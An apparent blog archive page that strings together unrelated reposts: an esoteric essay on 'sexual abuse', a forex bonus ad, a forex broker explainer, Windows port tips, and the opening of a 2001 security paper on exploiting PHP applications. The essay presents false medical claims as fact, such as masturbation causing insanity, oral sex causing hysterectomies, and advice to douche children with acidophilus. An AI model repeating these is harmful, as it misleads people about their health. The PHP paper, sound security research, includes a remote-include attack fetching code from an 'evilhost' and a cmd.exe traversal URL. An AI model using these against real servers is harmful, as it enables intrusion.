Snatch Pages: 2016

Saturday, December 3, 2016

Sexual Abuse and Its Effects - Torkom Saraydarian

It is an esoteric fact that waste of sexual energy burns certain parts of the mental mechanism. No one else can determine for you how often it is healthy for you to have sex; only the physical and psychological results reveal this to you.

Those engaged in higher creative work and abstract thinking must conserve sexual energy. They will then notice how creativity, understanding and higher inspiration are developing successfully. If sexual energy is saved or economically used, it helps to develop the personality.

Sexual energy is spread throughout the aura. It creates the magnetic mechanism which secures higher impressions. If this substance is weak, disturbed, or even absent, impressions are not correctly secured, and with incorrect reception, confused interpretation results.

I remember a person who came to my Teacher in the monastery and asked for help. “My mind is not together,” he said. “I am becoming lazy, diffused, forgetful and irritable. I have many problems.” The Teacher looked into his eyes and asked, “How many women do you love?” “Three,” he answered. “You need to stay in the monastery for six months to restore your brain,” the Teacher said.

The man stayed in the monastery after making arrangements to take care of his family. He attended classes and participated in sacred dances, sports and labour. The Teacher did not let him have a moment’s rest from 5:00 am until 10:00 pm. The results were amazing. He became a new man.

I remember the Teacher saying to him, “Excessive sex disturbs the rhythm and harmony of your mental atoms and you hallucinate instead of think. It even causes visual deceptions. The section of your mind that records events mixes the events of the past and present and you experience mental chaos. You develop hypocrisy an eventually you hate yourself.”

Intercourse is a process of fusion with a person of the opposite sex. This fusion is physical, emotional and mental. When you fuse with someone else, you share each other’s karma. One person’s karma becomes two people’s karma through sexual relations, which can be good or bad. That is why you must have sexual relations with only one partner so that you do not load yourself with the karma and pollution of many others. Sexual relations multiply our karma and sometimes make us indebted to the other person forever. Their karma ties us to them until we pay it.

The Teaching says it is best to have only one wife or husband. In this way a couple can gradually build real fusion or unity on all levels. This is the goal of marriage.

The average person is not able to be truly strict in his sexual behaviour. It is better for a person on the spiritual path who is dedicated to a great service to have fewer burdens and debts. We must not forget that advancement on the path and expansion of our field of service is in direct proportion to the degree of our karmic debt. Often people who are ready to enter higher levels of consciousness are prevented from doing so by past karma and are chained to a routine life.

Having multiple sexual partners increases your ties. Often these ties prevent you from having freedom to advance in service. Those who stay together for longer periods or even for many lives, evoke deeper beauty from each other. Those who are married and have affairs with others create serious complications in their families, especially in the lives of their children.

Those who want to go forwards on the path of spiritual evolution must be very discriminative in their sexual life. Sex is a powerful and precious energy which must not be wasted. Intercourse must be an effort to contact the highest within each other and to provide vehicles for incoming souls or for precipitating higher ideas and visions.

Masturbation is an abuse of sexual energy. Masturbation is very unhealthy for men, women and children. It creates a tremendous pressure in the grey matter of the brain; the pineal and pituitary glands are affected, and mental concentration is weakened.

If a person feels an urge to masturbate, an excellent remedy is to wash the sexual organs or to douche with acidophilus. Acidophilus stops sexual stimulation because it disinfects germs and microbes that create artificial sexual stimulation. Even children who want to masturbate should wash with acidophilus.

There is a great difference between intercourse and masturbation. In intercourse the man’s aura and the woman’s aura mix, and their etheric, emotional and mental counterparts slowly adjust with each other, filling the reservoir with the creative sexual energy used during intercourse. In masturbation, the reservoir of energies which creates and replenishes the sexual energy is not formed. In masturbation, one draws upon his reserves and wastes them. So much pressure is put on the grey matter of the brain from the depletion of energies brought about by masturbation that lack of concentration, lack of daring and creativity, and even insanity can result.

In healthy sexual intercourse, the man absorbs the woman’s energies and the woman absorbs the man’s energies. The energy which is absorbed replaces the secretions released during intercourse. That energy creates etheric energy which recharges the blood. In masturbation there is no exchange or absorption of energies; there is only loss. Furthermore, during masturbation a person creates sexual thoughtforms which are difficult to eliminate.

Another form of sexual abuse which is very harmful is oral sex. Oral sex destroys the aura’s equilibrium and harmonious vibration. If a woman gives fellatio to the man, it causes her to absorb the man’s energy without returning any. There is no etheric and astral exchange in this way.

In some medical books I have read that semen is a tremendous nourishment for women in oral sex. Women may benefit, but men eventually collapse. Men develop serious diseases when they lose energy without replenishment. One doctor cited the case of a man who became very nervous, lost weight, and eventually lost control of his mind because of oral sex.

Oral sex can be very dangerous for the woman, as her mouth absorbs any germs or disorders from the man’s physical organs and sex center. Also, because the throat center has a different, higher vibration than the sex center, it can become damaged from this incorrect merging. Men also absorb germs and damage their throat centers by engaging in oral sex.

Never let any man kiss your genitals or your breasts. Gum disease or decaying teeth carry infection to your organs or breasts. The breasts absorb germs and viruses from bleeding gums which weaken the woman and make her susceptible to disease. For similar reasons women should never let men touch them with unwashed hands during sexual relations.

Oral sex is a sign of retrogression, of going towards bestiality. It creates terrible interference between the throat and sex centers when they are forced into intercourse. In oral sex the throat center mixes with the etheric sex center and creates tremendous complications. Putting one’s throat center in contact with the sex center of another, lowers the frequency of the throat center and creative energy is lost.

In animals the throat and sex centers form a single unit, one not yet differentiated into two, as in the human being. This means that oral sex does not hurt animals while it does hurt human beings. The human throat center is the blooming of the sublimated sex center; it is the higher counterpart of the sex center.

A woman who practices oral sex pollutes her throat center with the low, coarse vibrations of the sex center, creating imbalance in her system. If a woman is highly advanced creatively, an artist or a singer, a year or two of oral sex may cause serious problems in her sexual organs. Most women I know who have had hysterectomies have practiced oral sex.

Oral sex alters the auras of both partners. The man becomes more feminine and the woman becomes more masculine. This happens because in oral sex the woman channels to the man the female principle and the man channels to the woman the male principle.

Certain ways of kissing are also very damaging. When you kiss by sucking each other’s tongue and the insides of the mouth, you infect yourself with microbes. All the germs and weaknesses of the body are carried in saliva. Some eye diseases stem from problems in the sexual organs. Through such kissing, blood diseases are also transmitted. Sometimes tuberculosis microbes are dormant in the organs and are transmitted to others and become active.

Men sometimes have intercourse but do not ejaculate as a method of birth control, or because they think they are saving their energies. This is a very harmful action. When a man’s penis is stimulated, the body creates excess seminal fluid to be used in the orgasm. When this fluid is not released, it accumulates and puts pressure on the testes and other glands. This accumulated pressure throws the whole body out of balance, causing the etheric counterpart of the sexual organs to swell etherically.

I spoke with several men who had their testes removed because of tumour or cancer, and all said they had practiced withholding ejaculation for a long time.

Some people think that a way to increase energy is to enjoy sex without orgasm. Such sex does not increase the etheric energy; on the contrary, the pressure on the sexual organs becomes so intense that after a few years those organs start to degenerate. Those who have intercourse without orgasm dig their own graves.

A certain group I knew experimented in this kind of sex. At first they felt very good. I told them to wait for two years before forming a conclusion. At the end of that period many of them had developed tumours and other sexual problems. Any abuse of Nature causes disease. We must learn not to exploit Nature.

Most weakness is not caused by lack of energy, but from excessive energy or congestion. We think we can fool Nature and draw pleasure from it without using energy, but we cannot fool Nature. If a man does not want to ejaculate, he should not become sexually stimulated.

Intercourse in the early morning is also very damaging. Many heart problems stem from early-morning intercourse. When you have sex in the morning your energy is exhausted, but you must get up and go to work, handle problems and deal with daily stress. Because you are exhausted you become irritated more easily.

If you have a headache in the morning after having intercourse the night before, it is a sign that something is wrong. There can be many causes for it, so you must find the right one. The headache could be caused by lack of energy. The sexual act is related to the liver, the heart, the brain, the spinal fluid and every chakra.

In the mental body there is also a sex center which is related to everything that you are. This center can be damaged in various ways and cause impotency or a feeling of sexual rejection. For example, if during intercourse you are shocked by bad news, an explosion or some kind of interference, this center closes up and is often damaged. If your partner creates jealousy, irritation, or disturbances in you by talking about other women or men while you are having sex, the sex center in the mental body becomes damaged. If the damage is serious enough, you first feel sexual repulsion; then you develop impotency or frigidity.

Many people now claim that it is healthy and natural for parents to have sex in front of their children. Such behaviour is very destructive for the children’s future. When a child watches his parents have intercourse, he does not become stimulated at that time because his sex center is closed and there is no response from it. But the image or thoughtform of sex is stored in his mind. Later, when the child’s sex center starts to become active, that sexual thoughtform will rush to the center, obsess it and urge him to have sex because of the image of his parents’ sexual intercourse. This happens anywhere between the ages of ten and fifteen and it is one of the causes of premature sexual stimulation in children. When such children become sexually mature, they feel so much pressure from the images accumulated in them that they are not able to control their sexual urges.

Rape is another form of sexual abuse. A man who rapes a woman is drinking a cup of poison. When a man forces a woman to have sex with him, her aura becomes poisonous for him. All the irritation, imperil, negativity, and karmic poisons in the aura of the woman enter the aura of the man. The rapist becomes even more sick mentally; he starts to fail in his business and he becomes a greater problem to society.

Sexual abuse has the following effects on the physical body:

1. Sexual abuse causes the body to lose its immune system, its defence mechanism against disease. As soon as you see that you are absorbing germs, refrain from sex so that you can refill your reservoir.

2. Sexual abuse weakens the nervous system and makes you shaky. Test whether you are having too much sex by stretching out your fingers and seeing if they tremble. Another test is to see whether you can stand on one foot without leaning, wobbling or moving at all.

3. Sexual abuse makes people lazy and sleepy and leads to inertia. When people complain that they cannot find a job, I ask them how often they have sex. Once they abstain for three or four months, usually the right job is waiting for them.

Whenever you want more sleep, it is usually because you lack energy. Sleep is the body’s automatic response mechanism to save energy. Tiredness is not always caused by waste of sexual energy, but wasting sexual energy is characterized by tiredness. Laziness is another effect of wasting sexual energy. When you conserve sexual energy, it is easy to wake up early, get chores done quickly, and do all the things you need to do. You have enthusiasm and interest, not only for your own activities, but also for your spouse, family and friends.

Enthusiasm and interest are operated solely on the fuel of sexual energy. If you do not have the fuel of sexual energy, you are an interesting or an interested person.

4. With sexual abuse the colour of the body becomes pale and the tissue around the eyes becomes dark; the voice becomes hoarse, lower and unclear, and it loses its energy. Singers immediately notice the effects of sexual abuse. I knew a great voice teacher in the Middle East who had a special soprano student with an outstanding voice. One day the student told the teacher she was going to be married. The teacher told her, “I hope you will be moderate in sex because if you are not, you may lose your voice.” The woman married a young man, did not follow her teacher’s advice, and gradually lost the outstanding quality of her voice.

Singing is related to the sex and throat centers. To be a great singer does not mean that you can never have sex, however, you cannot waste your energy and continue to be a great singer.

5. Sexual abuse leads to impotency at an early age. I have counselled thousands of people and most of their problems stem from impotency and frigidity. These are two of the major causes for divorce. Usually when I inquire into the background of such people, I find that they started having sex when very young.

Every real genius and server of humanity has control over and sublimation of his sex drive. A well-known Russian ballet dancer once told me that he had sex with his wife only once a month or once every two months. “It’s because I can’t dance if I have it more often,” he said. The energy and the elasticity for dancing come from the accumulation of sexual energy.

6. Because of sexual abuse, weaknesses develop in our relationships with others. Those who can live together the longest are those who economize their sexual energy. The ties of relationships slowly weaken and dissolve when sexual energy is wasted.

7. A person who abuses sex may have weak or retarded offspring, or offspring who have a strong inclination toward sex at an early age.

Whatever you are, you will produce the same kind. Such energies are so embedded in your aura that you will pass these same urges and drives on to your children. A normal child does not even think about sex until age sixteen or seventeen.

8. Sexual abuse leads to sickness and problems in life.

9. If a person’s body is still growing when he starts to abuse his sexual energy, his body will not reach its full height. A child who abuses sexual energy will often stop growing after age sixteen. This is a very serious condition, when we consider that normally a young woman can grow until age twenty-seven.

10. Sexual abuse weakens the eyesight.

11. Sexual abuse weakens the heart and may lead the person to heart disease.

12. Sexual abuse may lead to cancer. The cells of the body work overtime to replace the energy drained by sexual abuse.

13. Sexual abuse may lead to various others organic difficulties.

14. Those who abuse their sexual energy live twenty to thirty years less than they normally would have. I know may men who died young, in their thirties and forties, as a result of wasting sexual energy, particularly through masturbation.

15. Sexual abuse damages the pineal, pituitary and carotid glands.

The emotional effects of sexual abuse are:

1. nervousness

2. the urge to gossip

3. nosiness

4. irritability

5. destructiveness

6. indifference to responsibility and duties

7. desire to steal and an inclination toward crime

8. jealousy

9. selfishness

10. pessimism

11. a sense of isolation and wanting to be alone

12. hatred for the beauty in others

13. sneakiness

14. loss of magnetism of the aura

The mental effects of sexual abuse are:

1. loss of moral principles

2. no drive for achievement

3. lack of striving to know, to serve, to lead

4. mental diffusion

5. no higher goals

6. no contact with the Inner Guide

7. attempting to exploit people

8. misleading others

9. development of hatred and separatism

10. lying

11. vanity

12. showing off

13. various complicated mental problems and insanity coming to the surface

The spiritual effects of sexual abuse include the following:

1. The person is prevented from contacting higher spiritual energies. Celibacy is important before expansion of consciousness and initiations.

2. The knowledge petals lose energy and cannot unfold. As a result, wisdom is lacking on the three levels of the personality and the person falls into confusion. (The knowledge petals are found in each personality vehicle as a reservoir of knowledge and wisdom). When these petals are burned by sexual abuse, the person hears voices from the etheric and astral planes and no longer has control over his own speech.

3. The person can become obsessed.

4. The throat center becomes damaged.

5. Creative energy decreases in the mental body and the person cannot formulate or evoke higher concepts.

6. Ugly imagination develops.

7. The aura becomes polluted and contact with the forces of Nature is hindered. The aura is the mechanism of impressions. Only a pure aura is magnetic enough to allow the person to be approached by devas or Masters.

8. Telepathic communication stops.

9. Karma drastically increases for the person.

10. Relationships become very complicated.

11. Their children’s future is ruined.

When a person wastes sexual energy, he depletes love energy. This leads to depression, failure, destructive activities, irresponsibility, degenerative diseases, and even suicide. With a mind bereft of health, sanity and balance, the person introduces anti-survival directions into the seven fields of human endeavour. Politics becomes corrupted. Education is reduced to manipulation. Communication becomes a science of cleavages. Art falls into prostitution. Religion turns into fanaticism. Economics creates deficits and depression.

-Torkom Saraydarian

Sex, Family and the Woman in Society

Thursday, November 10, 2016

Risk Free $123+$5 No Deposit Bonus Forex For New Account/Registration

Risk Free $123+$5 No Deposit Bonus Forex For New Account/Registration

Register Here : https://fbs.com/

Tuesday, June 21, 2016

Types of Retail Forex Brokers: ECN vs DMA vs STP vs Market Maker

Contents

DD/MM(Market Maker, brokers that have dealing desks)

DD/MM Dealing Desk Brokers ( or Market Maker):

Act as a counterparty for client transactions
- Route orders through Dealing Desks
- “Make the market” and trade against clients. (They take the opposite side of the trade. When traders want to sell, they buy from them, when traders want to buy, they sell to them)
- Dealing desk brokers are able to profile their clients. They divide clients into groups systematically with algorithm. (Usually called “A Book”, “B Book”)
  - “A Book” Automation for losing clients: Broker automatically take the other side. Losing trades of clients are counter-traded and become brokers’ profit. More losing traders means more profit for the broker.
  - “B Book” Automation for winning clients: Broker automatically take the other side and then hedge the position in the real market that they have access to. (e.g. When traders buy , broker sell to them, then the broker buy the same amount in real market). This is also done automatically through algorithm. In this case, brokers will also make money (through spread or commission).
Fixed spreads
Makes money through spreads and when a client loses a trade.
Price Manipulation is possible. Traders can’t see the real market quotes.
Transparency of dealing desk brokers differ depending on their own company rules.

NDD(No Dealing Desk) Forex Brokers

Act as an intermediary
- No dealing desk = No market making = Straight-through processing
- Straight-through processing enables the trade process to be conducted electronically without manual intervention
- Providing access to the interbank market without dealing desk. All orders are passed to Liquidity Providers(LP) directly.
No re-quotes and no additional pausing when confirming orders.
Makes money by commission or spreads
In the retail fx markets usually there are 2 type of NDD forex brokers: Regular STP Forex Brokers & ECN Forex Brokers.

Benefits of No Dealing Desk brokers

Anonymity. Clients’ orders are executed automatically, immediately and anonymously. There is no dealing desk watching you orders.
Better&Faster fills. Because all Participants or liquidity providers compete for prices in a real market.
Transparency.

Liquidity providers (LPs)

Liquidity providers act as ‘supplier’ for forex brokers. Both LPs & forex brokers need to make money.
With NDD Forex Brokers, LP(s) are the counterparty to you trades. They take the opposite side of your position, and looking to make money by closing this position later in a trade with another party.
Prices are determined by LP(s)
- LPs compete for providing the best bid/ask rates for orders from brokers.
- More LPs usually means more depth in the liquidty pool,thus better spreads.
- Traders usually get variable spreads.
Number of Liquidity providers
- One Liquidity Provider. Some so-called ‘STP’ brokers have only one LP, so there will be no price competition, their role in fact are just IB (Introduing Broker). LP control the price(spread). Maintenance costs is lower, but the broker become completely dependent on the one LP.
- Most STP Brokers has a predetermined number of liquidity providers.
- ECN brokers have a large number of liquidity providers.

STP Forex Brokers

STP Forex Brokers don’t trade against clients
Make money through spreads mark-ups. They add small mark-ups on the best bid and ask rates they get from LPs. For example, adding a pip to the best bid price or subtracting a 0.6pip to the best ask price of their LPs
No dealing desk & No dealer intervention. Clients’ orders are directly sent to a certain number of liquidity providers (Banks or Other Brokers)
More liquidity providers means more liquidity and better fills for the clients.
Provide access to the real-time market quotes
Those STP Brokers that have fixed spreads won’t adjust spreads based on the lowest bid/ask prices offered by LPs. The fixed spreads they charge are higher than the best quotes they get from LPs. They may use their back-office price matching system to make sure they can make profits on spread difference while hedging the trades with LP(s) at better rates at the same time.

Direct Market Access

Forex DMA refers to electronic facilities that match orders from traders with bank market maker prices. It enables buy-side traders to trade in a transparent, low latency environment.

Direct access to the market. All orders are passed to LPs directly
Trader can place orders with LPs( banks, market makers, other brokers etc).
Only Market execution. STP brokers that offer Market execution provide true Direct Market Access (DMA)
- Market execution is more transparent. Orders go to the market,and are filled based on available quotes from LPs.(STP+DMA brokers will add a small mark-up in order to make profit)
- Instant execution is less transparent. Orders don’t go to the market. They are instantly filled by the broker, who then may (or may not) offset own risks with LPs. Some STP Forex brokers fill clients’ orders though Instant execution,after which they hedge these orders with their LPs in order to make profits. If there are no profitable hedging opportunities when traders submit their orders,they may experience re-quotes.
Orders are facilitated by brokers. The broker is not a market maker or liquidity destination on the DMA platform it provides to clients.
Platforms build a fixed mark up into the client’s dealing price and/or charge a commission.
Only variable spreads
optional: Depth of the market book access (DOM access)
ECN forex brokers always offer DMA, some STP brokers offer DMA

STP Forex Brokers that offer DMA:

List of STP+DMA brokers http://tradingt.com/dma/
STP+DMA Benefit

Anonymous platforms ensure neutral prices reflecting global FX market conditions.
There are no re-quotes, rate rejections or partial fills with the DMA model because their liquidity providers are committed to their bid/ask offers
Competitive prices
Transparency
Welcome all trading style

STP vs STP with DMA

STP+DMA brokers have more liquidity providers thus better prices for clients.
STP+DMA brokers always offer variable spreads,some STP Forex brokers offer fixed spreads
DMA order execution is always Market execution;
There are no re-quotes with the DMA model
DMA model allow all trading style:scalping,news trading, swing trading,position trading etc.

List of STP brokers http://tradingt.com/stp/

ECN Forex Brokers (ECN=Electronic Communications Network)

List of ECN Forex brokers: http://tradingt.com/ecn/ List of Metatrader ECN Forex brokers: http://tradingt.com/mt4-ecn/
ECN Brokers

ECN brokers pass your trades to an ECN pool, in which other liquidity providers(banks, hedge funds, brokers, individual traders) become a counterparty to your trade.
All participants (banks, market makers and retail traders) trade against each other by sending competing bids and offers into the system.
Allow clients’ orders to interact with each other.
Orders are matched between counter parties in real time.
Participants get the best offers for their trades available at the time.
Only variable spreads
Makes money only through commission. ECN brokers do not make money on spreads(bid/ask difference).
Display the Depth of the Market (DOM) in a data window. Traders can show their order size and other traders can hit those orders. Then can see where the liquidity is.

ECN Benefit

Anonymous trading environment.
Straight through processing with banks liquidity.
All trading styles are welcome
Interbanks prices and spreads. Greater number of marketplace participants means tighter spreads.
Greater price transparency, faster processing, increased liquidity.

ECN vs STP Brokers with DMA

ECN is the most transparent model. ECN Forex broker provides a marketplace where all its participants trade against each other real time.
Both offer only variable spreads;
STP+DMA Brokers will also add a small mark-up to make profit. ECN Brokers charge commission.
Both have fractional pricing;
Both have DOM (Depth of the Market) orders book. STP+DMA Brokers usually don’t show it to you.

Hybrid Model

Many brokers offer dealing desk account, ECN account or STP Account at the same time. Traders can choose the one they like.
Cents Account or Mini Account of a STP broker is usually the account that has a dealing desk. All small orders by traders (usually below 0.1 lot) can’t be sent to the liquidity providers, because they don’t accept small orders based on the contract they have with the forex broker.So they usually use dealing desk model for this type of account. .
Usually for orders above 0.1 lot, STP brokers send orders directly to it’s liquidity providers with STP Model.

Conclusion

Dealing desk brokers or Market makers make money on spreads and when clients lose trades. More winning traders will increase the operational risk of a dealing desk broker.
No dealing desks brokers are more transparent. They want their clients to win because clients’ losses are not their profit,and the more clients trade, the more profit for them(through commission or small spread mark-up).
Not all forex brokers will be honest with you,so whether you choose ECN , STP, or market maker,it’s important to trade with the broker that has a good reputation.

Monday, May 30, 2016

Disable Microsoft Network Discovery port 5357

Details	Source
5357	tcp,udp	wsdapi	Used by Microsoft Network Discovery, should be filtered for public networks. Disabling Network Discovery for any public network profile should close the port unless it's being used by another potentially malicious service. To disable Network Discovery for a public profile, navigate to: - Control Panel\Network and Internet\Network and Sharing Center\Advanced sharing settings - disable Network Discovery for any public network Port should be correctly mapped by the Windows Firewall to only accept connections from the local network. Malicious services using this port: Trojan.win32.monder.gen (a.k.a Trojan.Vundo) Port is also IANA registered for: Web Services for Devices (WSD) - a network plug-and-play experience that is similar to installing a USB device. WSD allows network-connected IP-based devices to advertise their functionality and offer these services to clients by using the Web Services protocol. WSD communicates over HTTP (TCP port 5357), HTTPS (TCP port 5358), and multicast to UDP port 3702.	SG
5357	tcp,udp	wsdapi	Web Services for Devices	IANA

Disable NetBIOS port 137 138 139

To disable NetBIOS over TCP/IP support

From the Network and Dial-up Connections icon in Control Panel , select Local Area Connection and right-click Properties .
On the General tab, click Internet Protocol (TCP/IP) in the list of components, and click the Properties button.
Click the Advanced button.
Click the WINS tab. Click Disable NetBIOS over TCP/IP .

source : https://technet.microsoft.com/en-us/library/cc940063.aspx

Sunday, May 29, 2016

A Study In Scarlet Exploiting Common Vulnerabilities in PHP Applications

From:  "Shaun Clowes" <shaun@securereality.com.au>
To:  <bugtraq@securityfocus.com>
Subject: A Study In Scarlet - Exploiting Common Vulnerabilities in PHP Applications
Date:  Tue, 3 Jul 2001 00:37:00 +1000

SecureReality is pleased to announce the release of our new paper entitled
'A Study In Scarlet - Exploiting Common Vulnerabilities in PHP
Applications'. The paper is based the speech I presented at the Black Hat
Briefings in Asia in April this year and is accompanied by 4 advisories (of
which one will be released at a later date). The paper can be downloaded
from http://www.securereality.com.au/archives.html and a copy has been
attached to this email.

Sincerely,
Shaun Clowes
SecureReality Pty Ltd

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

                           A Study In Scarlet
          Exploiting Common Vulnerabilities in PHP Applications

                                                                Shaun Clowes
                                                               SecureReality

"A reprint of reminisces from the Blackhat Briefings Asia 2001"

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

--- < Table of Contents > --------------------------------------------------

1. Introduction
2. Caveats and Scope
3. Global Variables
4. Remote Files
5. File Upload
6. Library Files
7. Session Files
8. Loose Typing And Associative Arrays
9. Target Functions
10. Protecting PHP
11. Responsibility - Language vs Programmer
12. Other

"I could imagine his giving a friend a little pinch of the latest vegetable
alkaloid, not out of malevolence, you understand, but simply out of a spirit
of inquiry in order to have an accurate idea of the effects." - Stamford

--- < 1. Introduction > ----------------------------------------------------

This paper is based on my speech during the Blackhat briefings in Singapore
and Hong Kong in April 2001. The speech was entitled "Breaking In Through
the Front Door - The impact of Web Applications and Application Service
Provision on Traditional Security Models". It initially discussed the trend
towards Web Applications (and ASP) and the holes in traditional security
methodology exposed by this trend. However, that's a long and boring
discussion so I'll save it for the policy makers.

The rest of the speech was spent talking about PHP. For those reading this
paper who don't know what PHP is, PHP stands for "PHP Hypertext
Preprocessor". It's a programming language (designed specifically for the
Web) in which PHP code is embedded in web pages. When a client requests a
page, the Web Server first passes the page to the language interpreter so
the code can be executed, the resulting page is then returned to the client.

Obviously this approach is much more suited to the page by page nature of
web transactions than traditional CGI languages such as Perl and C. PHP (and
to some extent other Web Languages) has the following characteristics:
 + Interpreted
 + Fast Execution - The interpreter is embedded in the web server, no fork()
or setup overhead
 + Feature Rich - Hundreds of non trivial builtin functions
 + Simple Syntax - Non declared and loosely typed variables, 'wordy'
function names

Over the course of this paper I'm going to try to explain why I feel the
last two characteristics make applications written in PHP easy to attack and
hard to defend. Then I'll finish off with a rant about distribution of
'blame' when it comes to software security.

"You must study him, then ... you'll find him a knotty problem, though. I'll
wager he learns more about you than you about him." - Stamford

--- < 2. Caveats and Scope > -----------------------------------------------

Almost all the observations in this paper refer to a default install of PHP
4.0.4pl1 (with MySQL, PostgreSQL, IMAP and OpenSSL support enabled) running
as a module under Apache 1.3.19 on a Linux machine. This of course means
that your mileage may vary, in particular, there have been many many
versions of PHP and they sometimes exhibit vastly different behaviour given
the same input.

Also, proponents of PHP tend to defend the language based on its extreme
configurability. I feel very confident the vast majority of users will not
modify the default PHP configuration at all, lest some of the amazing array
of freely available PHP software stop working. Thus I don't feel pressured
to defend my position based on configuration options, nonetheless I've
included a section about how to go defending PHP applications using these
configuration options.

Finally, some people deride this kind of work as 'trivial' or 'obvious',
particularly since I won't be discussing any specific vulnerabilities in
particular pieces of PHP software. To prove the risks are real and that even
programmer's that try hard fall into these traps 4 detailed advisories in
regards to specific pieces of vulnerable software will be released shortly
after this paper.

"I have to be careful ... for I dabble with poisons a good deal." - Sherlock
Holmes

--- < 3. Global Variables > ------------------------------------------------

As mentioned earlier, variables in PHP don't have to be declared, they're
automatically created the first time they are used. Nor are they
specifically typed, they're typed automatically based on the context in
which they are used. This is an extremely convenient way to do things from a
programmer's perspective (and is obviously a useful feature in a rapid
application development language). Once a variable is created it can be
referenced anywhere in the program (except in functions where it must be
explicitly included in the namespace with the 'global' function). The result
of these characteristics is that variables are rarely initialized by the
programmer, after all, when they're first created they are empty (i.e "").

Obviously the main function of a PHP based web application is usually to
take in some client input (form variables, uploaded files, cookies etc),
process the input and return output based on that input. In order to make it
as simple as possible for the PHP script to access this input, it's actually
provided in the form of PHP global variables. Take the following example
HTML snippet:

 <FORM METHOD="GET" ACTION="test.php">
 <INPUT TYPE="TEXT" NAME="hello">
 <INPUT TYPE="SUBMIT">
 </FORM>

Obviously this will display a text box and a submit button. When the user
presses the submit button the PHP script test.php will be run to process the
input. When it runs the variable $hello will contain the text the user
entered into the text box. It's important to note the implications of this,
this means that a remote attacker can create any variable they wish and have
it declared in the global namespace. If instead of using the form above to
call test.php, an attacker calls it directly with a url like
"http://server/test.php?hello=hi&setup=no", not only will $hello = "hi" when
the script is run but $setup will be "no" also.

An example of how this can be a real problem might be a script that was
designed to authenticate a user before displaying some important
information. For example:

 <?php
  if ($pass = "hello")
   $auth = 1;
  ...
  if ($auth == 1)
   echo "some important information";
 ?>

In normal operation the above code will check the password to decide if the
remote user has successfully authenticated then later check if they are
authenticated and show them the important information. The problem is that
the code incorrectly assumes that the variable $auth will be empty unless it
sets it. Remembering that an attacker can create variables in the global
namespace, a url like 'http://server/test.php?auth=1' will fail the password
check but the script will still believe the attacker has successfully
authenticated.

To summarize the above, a PHP script _cannot trust ANY variable it has not
EXPLICITLY set_. When you've got a rather large number of variables, this
can be a much harder task than it may sound.

Once common approach to protecting a script is to check that the variable is
not in the array HTTP_GET/POST_VARS[] (depending on the method normally used
to submit the form, GET or POST). When PHP is configured with track_vars
enabled (as it is by default) variables submitted by the user are available
both from the global variables and also as elements in the arrays mentioned
above. However, it's important to note that there are FOUR different arrays
for remote user input, HTTP_GET_VARS for variables submitted in the URL of
the get request, HTTP_POST_VARS for variables submitted in the post section
of a HTTP request, HTTP_COOKIE_VARS for variables submitted as part of the
cookie headers in the HTTP request and to a limited degree the
HTTP_POST_FILES array (in more recent versions of PHP). It is completely the
end users choice which method they use to submit variables, one request can
easily place variables in all four different arrays, a secure script needs
to check all four (though again, the HTTP_POST_FILES array shouldn't be an
issue except in exceptional circumstances).

"No man burdens his mind with small matters unless he has some very good
reason for doing so." - John Watson

--- < 4. Remote Files > ----------------------------------------------------

I'm going to repeat this frequently during this document but it bears
repeating, PHP is an extremely feature rich language. It ships with an
amazing amount of functionality out of the box and tries hard to make life
as easy as possible for the coder (or web designer as the case so often is).
From a security perspective, the more superfluous functionality offered by a
language and the less intuitive the possibilities, the more difficult it is
to secure applications written in it. An excellent example of this is the
Remote Files functionality of PHP.

The following piece of PHP code is designed to open a file:

 <?php
  if (!($fd = fopen("$filename", "r"))
   echo("Could not open file: $filename<BR>\n");
 ?>

The code attempts to open the file specified in the variable $filename for
reading and if it fails displays an error. Obviously this could be a simple
security issue if the user can set $filename and get the script to expose
/etc/passwd for example but one non intuitive this code could end up doing
is reading data from another web/ftp site. The remote files functionality
means that the majority of PHPs file handling functions can work
transparently on remote files via HTTP and FTP. If $filename were to contain
(for example)
"http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir" PHP will
actually make a HTTP request to the server "target", in this case trying to
exploit the unicode flaw.
This gets more interesting in the context of four other file functions that
support remote file functionality (*** except under Windows ***), include(),
require(), include_once() and require_once(). These functions take in a
filename and read that file and parse it as PHP code. They're typically used
to support the concept of code libraries, where common bits of PHP code are
stored in files and included as needed. Now take the following piece of
code:

 <?php
  include($libdir . "/languages.php");
 ?>

Presumably $libdir is a configuration variable that is meant to be set
earlier in script execution to the directory where the library files are
stored. If the attacker can cause the variable not to be set the script
(which is typically not a tremendously difficult task) and instead submit it
themselves they can modify the start of the path. This would normally gain
them nothing since they still end up only being able to access languages.php
in a directory of their choosing (poison null attacks like those possible on
Perl don't work under PHP) but with remote files the attack can submit any
code they wish to be executed. For example, if the attacker places a file on
a web server called languages.php containing the following:

 <?php
  passthru("/bin/ls /etc");
 ?>

then sets $libdir to "http://<evilhost>/" upon encountering the include
statement PHP will make a HTTP request to evilhost, retrieve the attackers
code and execute it, returning a listing of /etc to the attackers web
browser. Note that the attacking webserver (evilhost) can't be running PHP
or the code will be run on the attacking machine rather than the target
machine (see the "Other" section and its reference to SRADV00006 for an
example of code which survives being on a PHP enabled attacking machine).

"There are no crimes and no criminals in these days" - Sherlock Holmes

--- < 5. File Upload > -----------------------------------------------------

As if PHP hadn't already provided enough to make life easier for the
attacker the language provides automatic support for RFC 1867 based file
upload. Take the following form:

 <FORM METHOD="POST" ENCTYPE="multipart/form-data">
 <INPUT TYPE="FILE" NAME="hello">
 <INPUT TYPE="HIDDEN" NAME="MAX_FILE_SIZE" VALUE="10240">
 <INPUT TYPE="SUBMIT">
 </FORM>

This form will allow the web browser user to select a file from their local
machine then when they click submit the file will be uploaded to the remote
web server. This is obviously useful functionality but is PHPs response that
makes this dangerous. When PHP first receives the request, before it has
even BEGUN to parse the PHP script being called it will automatically
receive the file from the remote user, it will then check that the file is
no larger than specified in the $MAX_FILE_SIZE variable (10 kb in this case)
and the maximum file size set in the PHP configuration file, if it passes
these tests the file is SAVED on the local disk in a temporary directory.
Please read that again if that doesn't make you blink, a remote user can
send any file they wish to a PHP enabled machine and before a script has
even specified whether or not it accepts file uploads that file is SAVED on
the local disk.

I'm going to ignore any resource exhaustion attacks that may or may not be
possible using file upload functionality, I think they're fairly limited if
not impossible in any case.

First let's consider a script that IS designed to receive file uploads. As
